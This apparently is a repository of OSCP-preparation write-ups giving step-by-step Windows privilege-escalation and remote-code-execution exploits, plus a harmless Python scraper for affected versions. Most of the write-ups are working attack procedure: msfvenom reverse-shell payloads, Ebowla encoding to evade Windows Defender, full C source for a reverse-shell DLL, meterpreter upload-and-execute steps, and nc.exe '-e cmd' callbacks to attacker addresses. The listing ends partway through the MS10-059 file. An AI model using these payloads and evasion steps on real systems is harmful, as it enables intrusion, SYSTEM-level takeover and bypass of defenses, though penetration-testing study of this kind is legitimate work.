├── CVE-2017-0213.md ├── CVE-2018-8440.md ├── README.md ├── get_vulns.py ├── ms08-067.md ├── ms09-012.md ├── ms10-059.md ├── ms15-051.md ├── ms16-032.md ├── ms16-075.md ├── ms16-098.md └── ms17-010.md /CVE-2017-0213.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | CVE-2017-0232 | Windows COM Aggregate Marshaler Lets Local Users Gain Elevated Privileges | win_10 version_1511, win_10 version_1607, win_10 version_1703, win_10 version_1511 arc_x86, win_10 version_1607 arc_x86, win_10 version_1703 arc_x86, win_7 sp_1, win_7 sp_1 arc_x86, win_8.1, win_8.1 arc_x86, win_server_2008 sp_2, win_server_2008 sp_2 arc_x86, win_server_2008_r2 sp_1, win_server_2008_r2 sp_1 arc_x86, win_server_2012, win_server_2012 arc_x86, win_server_2016, win_server_2016 arc_x86 | 4 | 5 |

6 | 7 | This is my first ever Windows exploit that I modified myself(even though its just two lines) and compiled! If you haven't done this before like me then its a good time to start now!

8 | To compile the C++ exploit you will need Microsoft Visual Studio version 2015 or later. I am using Microsoft Visual Studio 2019 in this POC.

Make sure to install all the Extensions related to C++ such as " 9 | Desktop development with C++" , "Universal Windows Platform development" "C++/CLI support for v142 build tools" for Visual Studio 2019
or "Common tools for Visual C++ 2015" , "Microsoft Foundation Classes for C++" , "Windows XP Support for C++" for Visual Studio 2015.

10 | Assuming You have done installing, the next step is to find "vcvarsall.bat" in your Windows machine. In Visual Studio 2019 Community edition this file is located in : 11 | 12 | ``` 13 | C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvarsall.bat 14 | ``` 15 | 16 | In Visual Studio 2015 Community edition this file is located in : 17 | 18 | ``` 19 | C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat 20 | ``` 21 | I am compiling the exploit for a x64 target so if you are going to compile for x86 then change amd64 to x86 in the below command : 22 | 23 | ```sh 24 | "C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\VC\Auxiliary\Build\vcvarsall.bat" amd64 25 | ``` 26 | Running this from your Windows machine should present you with a similar message like this depending on the version you are using: 27 | 28 | ```sh 29 | ********************************************************************** 30 | ** Visual Studio 2019 Developer Command Prompt v16.0.0 31 | ** Copyright (c) 2019 Microsoft Corporation 32 | ********************************************************************** 33 | [vcvarsall.bat] Environment initialized for: 'x64' 34 | ``` 35 | Now we have access to a command named "cl" on this CMD, this command is like gcc/g++ for Windows to compile source code to binary. Don't close this CMD as we will need this to compile our exploit.
36 | Download the C++ source code from Here . It seems we need to add a library header to the exploit in order for the code to compile successfully. Add the below line at line 61 of the source code: 37 | 38 | ```sh 39 | #pragma comment(lib, "Advapi32.lib") 40 | ``` 41 | 42 | Save the file as CVE-2017-0213.cpp and now we can test compile to make sure that we can actually compile exploits properly. Navigate your CMD to where the exploit file is and execute : 43 | 44 | ```sh 45 | cl CVE-2017-0213.cpp /EHsc /DUNICODE /D_UNICODE 46 | ``` 47 | 48 | Running this should present below output if everything went okay : 49 | 50 | ```sh 51 | Microsoft (R) C/C++ Optimizing Compiler Version 19.20.27508.1 for x64 52 | Copyright (C) Microsoft Corporation. All rights reserved. 53 | 54 | CVE-2017-0213.cpp 55 | Microsoft (R) Incremental Linker Version 14.20.27508.1 56 | Copyright (C) Microsoft Corporation. All rights reserved. 57 | 58 | /out:CVE-2017-0213.exe 59 | CVE-2017-0213.obj 60 | ``` 61 | 62 | We can see a file named CVE-2017-0213.exe in the same directory which means the compilation worked correctly.

63 | If you have a Remote desktop Session on your target machine then you can just copy the exe file to the target machine now and run it which will fire another CMD as System if the exploit worked.
But if you only have command line access on your target System then let's modify another line to make it usable via command line!

64 | Note: we need meterpreter session to execute the binary because this exploit doesn't work from a non-interactive shell.
65 | We will create a reverse shell backdoor through msfvenom and change the exploit to get us a reverse shell as System instead of popping cmd.exe: 66 | 67 | ```sh 68 | msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST= LPORT=9005 -a x64 -o rev.exe 69 | ``` 70 | 71 | Now this binary will be immediately deleted on a windows 10 or server 2016 box if Windows Defender is active. If you are trying this against a windows 7 box you don't need to encode the binary and skip this part. We will obfuscate the exe by encoding it with a tool named "Ebowla" ( now deprecated but still works! ) to bypass the defender. It Requires Go, Python 2 and Pip 72 | 73 | ```sh 74 | git clone https://github.com/Genetic-Malware/Ebowla.git 75 | pip install configobj 76 | ``` 77 | 78 | The tool is ready to be used. Now edit the "genetic.config" file inside the Ebowla directory, find and change the following Variables : 79 | 80 | ```sh 81 | Encryption_Type = ENV 82 | output_type = GO 83 | payload_type = EXE 84 | ``` 85 | 86 | Find the [[ENV_VAR]] section. Set the value of the "computername" variable to the output of "hostname" command on your target machine. Suppose mine is 'tally' so I am putting it like this : 87 | 88 | ```sh 89 | username = '' 90 | computername = 'tally' 91 | homepath = '' 92 | homedrive = '' 93 | Number_of_processors = '' 94 | processor_identifier = '' 95 | processor_revision = '' 96 | userdomain = '' 97 | systemdrive = '' 98 | userprofile = '' 99 | path = '' 100 | temp = '' 101 | ``` 102 | 103 | Leave other variables mentioned above blank and rest of the variables default, save and exit. 104 | Now copy the rev.exe file in the Ebowla directory and execute : 105 | 106 | ```sh 107 | python ebowla.py rev.exe genetic.config 108 | 109 | ./build_x64_go.sh output/go_symmetric_rev.exe.go revx.exe 110 | ``` 111 | 112 | This produced an encoded version of the original exe program on output/revx.exe which won't get blocked by Windows Defender. 113 | Now its time to modify our exploit command inside the exploit C++ source file to run the revx.exe instead of firing cmd.exe. Head to line 733 of the source file and change the line to this : 114 | 115 | ```sh 116 | WCHAR cmdline[] = L"C:\\Users\\Public\\revx.exe"; 117 | ``` 118 | 119 | Save the source file as mod.cpp and compile it : 120 | 121 | ```sh 122 | cl mod.cpp /EHsc /DUNICODE /D_UNICODE 123 | ``` 124 | 125 | Now we have the mod.exe binary exploit file. Copy that file to your linux machine. We will use our meterpreter session to upload the mod.exe and the revx.exe to our target box: (adjust the source file location if they are not in the same directory) 126 | 127 | ```sh 128 | meterpreter > upload mod.exe C:\\Users\\Public\\ 129 | meterpreter > upload revx.exe C:\\Users\\Public\\ 130 | ``` 131 | 132 | Remember we had set Port 9005 in our rev.exe file so fire a netcat listener on a different terminal to listen on that port in order to catch the incoming reverse shell. Now all we have left to do is execute the mod.exe from our meterpreter session: 133 | 134 | ```sh 135 | meterpreter > execute -f C:\\Users\\Public\\mod.exe 136 | Process XXXX created. 137 | ``` 138 | 139 | You should receive a message like Process XXXX created. and receive a reverse shell as System on your netcat listener!

140 | Note: In-case your exploit fails migrate your meterpreter session to an interactive process and try again. 141 | -------------------------------------------------------------------------------- /CVE-2018-8440.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | CVE-2018-8440 | Microsoft Windows Task Scheduler ALPC Interface Local Privilege Escalation Vulnerability | win_10 version_1607 arc_x64,win_10 version_1607 arc_x86,win_server_2008 sp_2 arc_x64,win_rt arc_x86,win_10 version_1803 arc_x86,win_10 arc_x64,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_server_2016 arc_x86,win_server_2008 sp_2 arc_x86,win_server_1709 arc_x86,win_8.1 arc_x86,win_server_1803 arc_x86,win_server_2008 sp_1 arc_x64,win_10 version_1803 arc_x64,win_7 sp_1 arc_x86,win_10 arc_x86,win_server_2008 sp_1 arc_x86 | 4 | 5 |

6 | 7 | First to verify if this exploit will work to see if we have Read+Execute access for Authenticated Users group on the `C:\Windows\Tasks` folder. We can check those permisions using `icacls` : 8 | 9 | ```sh 10 | PS C:\> icacls C:\Windows\Tasks 11 | C:\Windows\Tasks NT AUTHORITY\Authenticated Users:(RX,WD) 12 | BUILTIN\Administrators:(F) 13 | BUILTIN\Administrators:(OI)(CI)(IO)(F) 14 | NT AUTHORITY\SYSTEM:(F) 15 | NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F) 16 | NT AUTHORITY\SYSTEM:(F) 17 | CREATOR OWNER:(OI)(CI)(IO)(F) 18 | 19 | Successfully processed 1 files; Failed processing 0 files 20 | ``` 21 | 22 | If we have RX for Authenticated Users we can proceed with the exploit.

23 | Next we need a malicious DLL for the exploit to execute and give us what we want, a reverse shell. To generate the DLL copy the below source code and change <Your-Machine-IP> and save it as rs.cpp: 24 | 25 | ```c 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #pragma comment(lib, "Ws2_32.lib") 33 | 34 | #define REMOTE_ADDR "" 35 | #define REMOTE_PORT "443" 36 | 37 | void revShell(); 38 | 39 | BOOL WINAPI DllMain(HINSTANCE hinstDll, DWORD dwReason, LPVOID lpReserved) 40 | { 41 | switch(dwReason) 42 | { 43 | case DLL_PROCESS_ATTACH: 44 | revShell(); 45 | break; 46 | case DLL_PROCESS_DETACH: 47 | break; 48 | case DLL_THREAD_ATTACH: 49 | break; 50 | case DLL_THREAD_DETACH: 51 | break; 52 | } 53 | 54 | return 0; 55 | } 56 | void revShell() 57 | { 58 | FreeConsole(); 59 | WSADATA wsaData; 60 | int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); 61 | struct addrinfo *result = NULL, *ptr = NULL, hints; 62 | memset(&hints, 0, sizeof(hints)); 63 | hints.ai_family = AF_UNSPEC; 64 | hints.ai_socktype = SOCK_STREAM; 65 | hints.ai_protocol = IPPROTO_TCP; 66 | getaddrinfo(REMOTE_ADDR, REMOTE_PORT, &hints, &result); 67 | ptr = result; 68 | SOCKET ConnectSocket = WSASocket(ptr->ai_family, ptr->ai_socktype, ptr->ai_protocol, NULL, NULL, NULL); 69 | connect(ConnectSocket, ptr->ai_addr, (int)ptr->ai_addrlen); 70 | STARTUPINFO si; 71 | PROCESS_INFORMATION pi; 72 | ZeroMemory(&si, sizeof(si)); 73 | si.cb = sizeof(si); 74 | ZeroMemory(&pi, sizeof(pi)); 75 | si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 76 | si.wShowWindow = SW_HIDE; 77 | si.hStdInput = (HANDLE)ConnectSocket; 78 | si.hStdOutput = (HANDLE)ConnectSocket; 79 | si.hStdError = (HANDLE)ConnectSocket; 80 | TCHAR cmd[] = TEXT("C:\\WINDOWS\\SYSTEM32\\CMD.EXE"); 81 | CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); 82 | WaitForSingleObject(pi.hProcess, INFINITE); 83 | CloseHandle(pi.hProcess); 84 | CloseHandle(pi.hThread); 85 | WSACleanup(); 86 | } 87 | ``` 88 | 89 | Next to compile this you need to have `mingw-w64` installed.(`apt install mingw-w64`)

90 | Execute below command to compile it as DLL : 91 | 92 | ```sh 93 | x86_64-w64-mingw32-g++ rs.cpp -o rs.dll -lws2_32 -shared 94 | ``` 95 | 96 | Depending on your target box, download one of the exploit binaries: 97 | 98 | * [ALPC_DiagHub.x64.exe](https://github.com/realoriginal/alpc-diaghub/raw/master/ALPC_DiagHub.x64.exe) 99 | * [ALPC_DiagHub.x86.exe](https://github.com/realoriginal/alpc-diaghub/raw/master/ALPC_DiagHub.x86.exe) 100 | 101 |
102 | 103 | Upload the exploit file and the rs.dll on your target box in a same directory, start netcat listener on the port mentioned in the DLL source and execute: 104 | 105 | ```sh 106 | cmd /c ALPC_DiagHub.x64.exe rs.dll .\lol.rtf 107 | ``` 108 | 109 | You should receive reverse shell as SYSTEM instantly on your netcat listener. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Reverse Shell-able Exploit POCs 2 | 3 | Sharing the list of Windows exploits I encountered during my preparation for OSCP that didn't require GUI access and can be exploited via reverse shell. 4 | 5 | I wrote a small proof-of-concept writeup for each of them and the affected versions were collected using [this script](get_vulns.py) I wrote in a quick and dirty way by scraping Microsoft and CVE website. 6 | 7 | I do not guarantee the accuracy of the informations listed here, you know what you are doing best! Suggested aproach is to use this wiki after running Windows Exploit Suggester / Sherlock / Watson.

8 | 9 | 10 | | CVE / MS | Title | Vulns | 11 | | --------- | ----- | ----- | 12 | | [CVE-2017-0213](CVE-2017-0213.md) | Windows COM Aggregate Marshaler Lets Local Users Gain Elevated Privileges | win_10 version_1511, win_10 version_1607, win_10 version_1703, win_10 version_1511 arc_x86, win_10 version_1607 arc_x86, win_10 version_1703 arc_x86, win_7 sp_1, win_7 sp_1 arc_x86, win_8.1, win_8.1 arc_x86, win_server_2008 sp_2, win_server_2008 sp_2 arc_x86, win_server_2008_r2 sp_1, win_server_2008_r2 sp_1 arc_x86, win_server_2012, win_server_2012 arc_x86, win_server_2016, win_server_2016 arc_x86 | 13 | | [CVE-2018-8440](CVE-2018-8440.md) | Microsoft Windows Task Scheduler ALPC Interface Local Privilege Escalation Vulnerability | win_10 version_1607 arc_x64,win_10 version_1607 arc_x86,win_server_2008 sp_2 arc_x64,win_rt arc_x86,win_10 version_1803 arc_x86,win_10 arc_x64,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_server_2016 arc_x86,win_server_2008 sp_2 arc_x86,win_server_1709 arc_x86,win_8.1 arc_x86,win_server_1803 arc_x86,win_server_2008 sp_1 arc_x64,win_10 version_1803 arc_x64,win_7 sp_1 arc_x86,win_10 arc_x86,win_server_2008 sp_1 arc_x86 | 14 | | [CVE-2008-4250 / MS08-067](ms08-067.md) | Microsoft Windows Server - Code Execution | win_vista sp_1 arc_x64,win_server_2003 arc_x64,win_xp sp_2 arc_x86,win_xp sp_3 arc_x86,win_xp arc_x64,win_server_2003 sp_1 arc_x86,win_server_2008 arc_x64,win_server_2003 sp_2 arc_x86,win_server_2003 sp_2 arc_x64,win_2000 sp_4 arc_x86,win_xp sp_2 arc_x64,win_vista sp_1 arc_x86,win_server_2008 arc_x86 | 15 | | [CVE-2009-0079 / MS09-012](ms09-012.md) | Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation. Churraskito.exe/churrasco.exe | win_2000 sp_4 arc_x86,win_vista sp_1 arc_x86,win_vista sp_1 arc_x64,win_xp sp_2 arc_x64,win_server_2008 arc_x64,win_xp sp_2 sp_3 arc_x86,win_server_2008 arc_x86,win_xp sp_2 arc_x86,win_server_2003 sp_2 arc_x64,win_xp sp_3 arc_x86,win_server_2003 sp_1 sp_2 arc_x86 | 16 | | [CVE-2010-2554 / MS10-059](ms10-059.md) | Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege. Chimichurri.exe | win_server_2008 sp_2 arc_x86,win_vista sp_1 sp_2 arc_x86,win_server_2008 arc_x86,win_10 arc_x86,win_server_2008 arc_x64,win_vista sp_1 sp_2 arc_x64,win_server_2008 sp_2 arc_x64,win_10 arc_x64 | 17 | | [CVE-2015-1701 / MS15-051](ms15-051.md) | ClientCopyImage Win32k | win_vista sp_2 arc_x64,win_8 arc_x64,win_server_2008 sp_2 arc_x64,win_8 arc_x86,win_server_2012 arc_x86,win_server_2003 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_8.1 arc_x86,win_8.1 arc_x64,win_10 sp_1 arc_x86,win_server_2008 sp_2 arc_x86,win_vista sp_2 arc_x86,win_server_2003 sp_2 arc_x86,win_10 sp_1 arc_x64,win_server_2008 sp_1 arc_x86 | 18 | | [CVE-2016-0099 / MS16-032](ms16-032.md) | Secondary Logon Handle Privilege Escalation | win_server_2008 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_10 arc_x64,win_vista sp_2 arc_x86,win_10 version_1511 arc_x86,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_10 version_1511 arc_x64,win_server_2008 sp_2 arc_x86,win_10 arc_x86,win_8.1 arc_x86,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_7 sp_1 arc_x86,win_server_2008 sp_1 arc_x86 | 19 | | [MS16-075](ms16-075.md) | Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM (JuicyPotato) | win_server_2008 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_10 arc_x64,win_vista sp_2 arc_x86,win_10 version_1511 arc_x86,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_10 version_1511 arc_x64,win_server_2008 sp_2 arc_x86,win_10 arc_x86,win_8.1 arc_x86,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_7 sp_1 arc_x86,win_server_2008 sp_1 arc_x86 | 20 | | [CVE-2016-3309 / MS16-098](ms16-098.md) | RGNOBJ Integer Overflow on Windows 8.1 x64 bit by abusing GDI objects | win_7 version_1511 arc_x64,win_7 version_1511 arc_x86,win_server_2008 sp_2 arc_x86,win_10 sp_1 arc_x86,win_10 sp_1 arc_x64,win_server_2012 arc_x86,win_7 version_1607 arc_x64,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_server_2008 sp_2 arc_x64,win_7 arc_x64,win_8.1 arc_x86,win_7 arc_x86,win_7 version_1607 arc_x86,win_vista sp_2 arc_x86,win_server_2008 sp_1 arc_x64,win_server_2008 sp_1 arc_x86 | 21 | | [CVE-2017-0144 / MS17-010](ms17-010.md) | Windows SMB Remote Code Execution (Eternalblue) | win_server_2008 sp_1 arc_x64,win_7 version_1511 arc_x64,win_server_2016 arc_x64,win_7 version_1607 arc_x86,win_server_2008 sp_2 arc_x64,win_server_2008 sp_2 arc_x86,win_7 arc_x64,win_vista sp_2 arc_x86,win_8.1 arc_x86,win_10 sp_1 arc_x64,win_server_2008 sp_1 arc_x86,win_10 sp_1 arc_x86,win_vista sp_2 arc_x64,win_7 version_1607 arc_x64,win_7 arc_x86,win_8.1 arc_x64,win_7 version_1511 arc_x86,win_server_2012 arc_x86 | 22 | -------------------------------------------------------------------------------- /get_vulns.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # By Rayhan0x01 3 | import re, requests 4 | from bs4 import BeautifulSoup 5 | 6 | headers = { 7 | "User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 8 | } 9 | 10 | def get_vuln_by_cve(cveid): 11 | req = requests.get('https://www.cvedetails.com/cve/CVE-%s/' % cveid, headers=headers) 12 | soup = BeautifulSoup(req.text, 'html.parser') 13 | table1 = str(soup.find('table', id="vulnprodstable")) 14 | os_list1 = re.findall('title=\"Product Details (.*?)\"',table1) 15 | st = [] 16 | for w in os_list1: 17 | if w.startswith('Microsoft '): 18 | w = w.replace('Microsoft ','') 19 | finalkey = "" 20 | if w.startswith('Windows 2000'): 21 | finalkey = "win_2000" 22 | elif w.startswith('Windows Vista'): 23 | finalkey = "win_vista" 24 | elif w.startswith('Windows 7'): 25 | finalkey = "win_7" 26 | elif w.startswith('Windows 10'): 27 | finalkey = "win_10" 28 | elif w.startswith('Windows XP'): 29 | finalkey = "win_xp" 30 | elif w.startswith('Windows 8.1'): 31 | finalkey = "win_8.1" 32 | elif w.startswith('Windows 8'): 33 | finalkey = "win_8" 34 | elif w.startswith('Windows Server'): 35 | fname = re.findall('Windows Server (\d+)',w) 36 | if fname: 37 | finalkey = "win_server_" + str(fname[0]) 38 | else: 39 | fname = "win_server" 40 | 41 | else: 42 | # print('Could not extract : %s' % w) 43 | continue 44 | if "Service Pack" in w: 45 | sps = [] 46 | sps = re.findall(r'Service Pack (\d)',w) 47 | if sps: 48 | for sp in sps: 49 | finalkey = finalkey + " " + "sp_" + str(sp) 50 | elif " SP" in w: 51 | sps = re.findall(r' SP(\d)',w) 52 | if sps: 53 | for sp in sps: 54 | finalkey = finalkey + " " + "sp_" + str(sp) 55 | if "Version" in w: 56 | sps = re.findall(r'Version (\d+) ',w) 57 | if sps: 58 | for sp in sps: 59 | finalkey = finalkey + " " + "version_" + str(sp) 60 | if "x64" in w: 61 | finalkey = finalkey + " arc_x64" 62 | if "x86" in w: 63 | finalkey = finalkey + " arc_x86" 64 | elif "32-bit" in w: 65 | finalkey = finalkey + " arc_x86" 66 | if "x64" not in finalkey and "x86" not in finalkey: 67 | finalkey2 = finalkey + " arc_x86" 68 | finalkey3 = finalkey + " arc_x64" 69 | st.append(finalkey2) 70 | st.append(finalkey3) 71 | else: 72 | st.append(finalkey) 73 | st = list(set(st)) 74 | return(st) 75 | 76 | def get_vuln_by_bid(bid): 77 | req = requests.get('https://www.securityfocus.com/bid/%s/info' % bid, headers=headers) 78 | #soup = BeautifulSoup(req.text,'html.parser') 79 | src = req.text 80 | #print(src) 81 | tdsrc = re.findall('Vulnerable:<\/span>(.*?)',src,re.DOTALL)[0] 82 | # print(tdsrc) 83 | oslist = re.findall('Microsoft Windows (.*?)(.*?)<\/a><\/td>',table1) 148 | if not os_list1: 149 | os_list = re.findall('\\n\[(.*?)\]\(',table1) 150 | os_list1 = [x for x in os_list if '**' not in x and 'Windows' in x] 151 | if not os_list1: 152 | os_list = re.findall('(.*?)<\/a>',table1) 153 | os_list1 = [x for x in os_list if '**' not in x and 'Windows' in x] 154 | if not os_list1: 155 | os_list = re.findall('(.*?)',table1) 156 | os_list1 = [x for x in os_list if '**' not in x and 'Windows' in x] 157 | st = [] 158 | for w in os_list1: 159 | finalkey = "" 160 | if w.startswith('Microsoft Windows 2000'): 161 | finalkey = "win_2000" 162 | elif w.startswith('Windows Vista'): 163 | finalkey = "win_vista" 164 | elif w.startswith('Windows 7'): 165 | finalkey = "win_7" 166 | elif w.startswith('Windows 10'): 167 | finalkey = "win_10" 168 | elif w.startswith('Windows XP'): 169 | finalkey = "win_xp" 170 | elif w.startswith('Windows 8.1'): 171 | finalkey = "win_8.1" 172 | elif w.startswith('Windows 8'): 173 | finalkey = "win_8" 174 | elif w.startswith('Windows Server'): 175 | fname = re.findall('Windows Server (\d+)',w) 176 | if fname: 177 | finalkey = "win_server_" + str(fname[0]) 178 | else: 179 | fname = "win_server" 180 | 181 | else: 182 | # print('Could not extract : %s' % w) 183 | continue 184 | if "Service Pack" in w: 185 | sps = [] 186 | sps = re.findall(r'Service Pack (\d)',w) 187 | if sps: 188 | for sp in sps: 189 | finalkey = finalkey + " " + "sp_" + str(sp) 190 | elif " SP" in w: 191 | sps = re.findall(r' SP(\d)',w) 192 | if sps: 193 | for sp in sps: 194 | finalkey = finalkey + " " + "sp_" + str(sp) 195 | if "Version" in w: 196 | sps = re.findall(r'Version (\d+) ',w) 197 | if sps: 198 | for sp in sps: 199 | finalkey = finalkey + " " + "version_" + str(sp) 200 | if "x64" in w: 201 | finalkey = finalkey + " arc_x64" 202 | if "x86" in w: 203 | finalkey = finalkey + " arc_x86" 204 | elif "32-bit" in w: 205 | finalkey = finalkey + " arc_x86" 206 | if "x64" not in finalkey and "x86" not in finalkey: 207 | finalkey = finalkey + " arc_x86" 208 | 209 | st.append(finalkey) 210 | st = list(set(st)) 211 | return(st) 212 | 213 | 214 | print(','.join(get_vuln_by_msid("ms09-012"))) 215 | print(','.join(get_vuln_by_bid("105153"))) 216 | print(','.join(get_vuln_by_cve("2018-0952"))) -------------------------------------------------------------------------------- /ms08-067.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | CVE-2008-4250 / MS08-067 | Microsoft Windows Server - Code Execution | win_vista sp_1 arc_x64,win_server_2003 arc_x64,win_xp sp_2 arc_x86,win_xp sp_3 arc_x86,win_xp arc_x64,win_server_2003 sp_1 arc_x86,win_server_2008 arc_x64,win_server_2003 sp_2 arc_x86,win_server_2003 sp_2 arc_x64,win_2000 sp_4 arc_x86,win_xp sp_2 arc_x64,win_vista sp_1 arc_x86,win_server_2008 arc_x86 | 4 | 5 |

6 | 7 | In order to exploit this vulnerability we will use this Python2 script - [ms08-067.py](https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py)
8 | This script requires `impacket, pycrypto`. They are installed by default in Kali but if you don't have it already then install with : 9 | 10 | ```sh 11 | pip install pycrypto 12 | git clone https://github.com/CoreSecurity/impacket.git 13 | cd impacket && pip install . 14 | ``` 15 | Next we have to replace the shellcode inside the script. We'll use msfvenom to generate the shellcode : 16 | 17 | ```sh 18 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -v shellcode -f py -a x86 --platform windows 19 | ``` 20 | on the above command we used -b to specify bad characters that would be avoided on the shellcode.
21 | Copy the generated shellcode, remove existing shellcode from line 54-79 in the script and replace it with your shellcode.
22 | 23 | The script has a nice script usage output when run, you can exploit total 7 different versions of windows with same script: 24 | 25 | ```sh 26 | Example: ms08_067_2018.py 1 445 -- for Windows XP SP0/SP1 Universal, port 445 27 | Example: ms08_067_2018.py 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used) 28 | Example: ms08_067_2018.py 3 445 -- for Windows 2003 SP0 Universal 29 | Example: ms08_067_2018.py 4 445 -- for Windows 2003 SP1 English 30 | Example: ms08_067_2018.py 5 445 -- for Windows XP SP3 French (NX) 31 | Example: ms08_067_2018.py 6 445 -- for Windows XP SP3 English (NX) 32 | Example: ms08_067_2018.py 7 445 -- for Windows XP SP3 English (AlwaysOn NX) 33 | ``` 34 | 35 | Since I am targeting a `Windows XP SP3 English` I'll use the 6th example.
36 | Next start a netcat listener on the port you specified on your msfvenom payload and leave it running.
37 | Now all that's left is to run the script: 38 | 39 | ```sh 40 | python ms08-067.py 10.10.10.4 6 445 41 | ``` 42 | 43 | It should send a reverse shell as System on your netcat listener. -------------------------------------------------------------------------------- /ms09-012.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | CVE-2009-0079 / MS09-012 | Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation. Churraskito.exe/churrasco.exe | win_2000 sp_4 arc_x86,win_vista sp_1 arc_x86,win_vista sp_1 arc_x64,win_xp sp_2 arc_x64,win_server_2008 arc_x64,win_xp sp_2 sp_3 arc_x86,win_server_2008 arc_x86,win_xp sp_2 arc_x86,win_server_2003 sp_2 arc_x64,win_xp sp_3 arc_x86,win_server_2003 sp_1 sp_2 arc_x86 | 4 | 5 |

6 | 7 | By the time of writing this, The original author's research files were no longer accessible and 3 of the exploit binaries by the same author was : 8 | * Churraskito.exe 9 | * churrasco.exe 10 | * Chimichuri.exe 11 | 12 | I may be wrong to assume Churraskito.exe, churrasco.exe is ms09-012 and Chimichuri.exe is ms10-059.
Even the Github repository where the binaries collected from has mixed contents of these binaries under both of the bulletins.
13 | But testing both Churraskito.exe and churrasco.exe worked on Windows Server 2003 and they should possibly work on Windows Server 2008 as well. 14 | 15 |

Churraskito.exe

16 | 17 | First download the exe from github : [CVE-2014-4113-Exploit.rar](https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/Churraskito_exe.zip)
18 | Extract and upload binary in your target system. Next run the binary with two arguments : 19 | 20 | ```bash 21 | Churraskito.exe "C:\windows\system32\cmd.exe" "whoami" 22 | 23 | #Output 24 | /Churraskito/-->This exploit gives you a Local System shell 25 | /Churraskito/-->Build By Moskerde 26 | /Churraskito/-->Got WMI process Pid: 1844 27 | /Churraskito/-->Start Searching... 28 | /Churraskito/-->Found token SYSTEM 29 | /Churraskito/-->Running As system account! 30 | /Churraskito/-->Command:C:\windows\system32\cmd.exe /c whoami 31 | 32 | nt authority\system 33 | ``` 34 | 35 | if you have nc.exe uploaded on the target box, get reverse shell like this : 36 | 37 | ```sh 38 | Churraskito.exe "C:\\Inetpub\\wwwroot\\nc.exe" " -e cmd" 39 | 40 | #Output 41 | /Churraskito/-->This exploit gives you a Local System shell 42 | /Churraskito/-->Build By Moskerde 43 | /Churraskito/-->Got WMI process Pid: 1844 44 | /Churraskito/-->Start Searching... 45 | /Churraskito/-->Found token SYSTEM 46 | /Churraskito/-->Running As system account! 47 | /Churraskito/-->Command:C:\\Inetpub\\wwwroot\\nc.exe /c 10.10.14.12 9002 -e cmd 48 | 49 | ``` 50 | 51 | 52 |

churrasco.exe

53 | 54 | First download the exe from github : [churrasco.exe](https://raw.githubusercontent.com/Re4son/Churrasco/master/churrasco.exe)
55 | Now upload the binary in your target system. Next run the binary with commands as argument : 56 | 57 | ```sh 58 | C:\\Inetpub\\wwwroot\\churrasco.exe whoami 59 | 60 | #Output 61 | nt authority\system 62 | ``` 63 | if you have nc.exe uploaded on the target box, get reverse shell like this : 64 | 65 | ```sh 66 | C:\\Inetpub\\wwwroot\\churrasco.exe "C:\\Inetpub\\wwwroot\\nc.exe -e cmd" 67 | 68 | ``` 69 | -------------------------------------------------------------------------------- /ms10-059.md: -------------------------------------------------------------------------------- 1 | | CVE / MS | Title | Vulns | 2 | | --------- | ----- | ----- | 3 | | CVE-2010-2554 / MS10-059 | Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege. Chimichurri.exe | win_server_2008 sp_2 arc_x86,win_vista sp_1 sp_2 arc_x86,win_server_2008 arc_x86,win_10 arc_x86,win_server_2008 arc_x64,win_vista sp_1 sp_2 arc_x64,win_server_2008 sp_2 arc_x64,win_10 arc_x64 | 4 | 5 |

6 | 7 | First download the file [Chimichurri.exe](https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe) on your local machine and start a samba server using impacket-smbserver 8 | 9 | ```sh 10 | sudo impacket-smbserver myshare `pwd` -smb2 11 | ``` 12 | 13 | We can directly execute the file from the smb server. The exploit program takes IP and Port as arguments and sends a reverse shell back. We start a netcat listener on port 9001 to catch the System shell.
14 | Now from our target's user Shell execute : 15 | 16 | ```sh 17 | \\\myshare\Chimichurri.exe 9001 18 | ``` 19 | 20 | Wait a few seconds and you just got a System shell on your netcat listener!
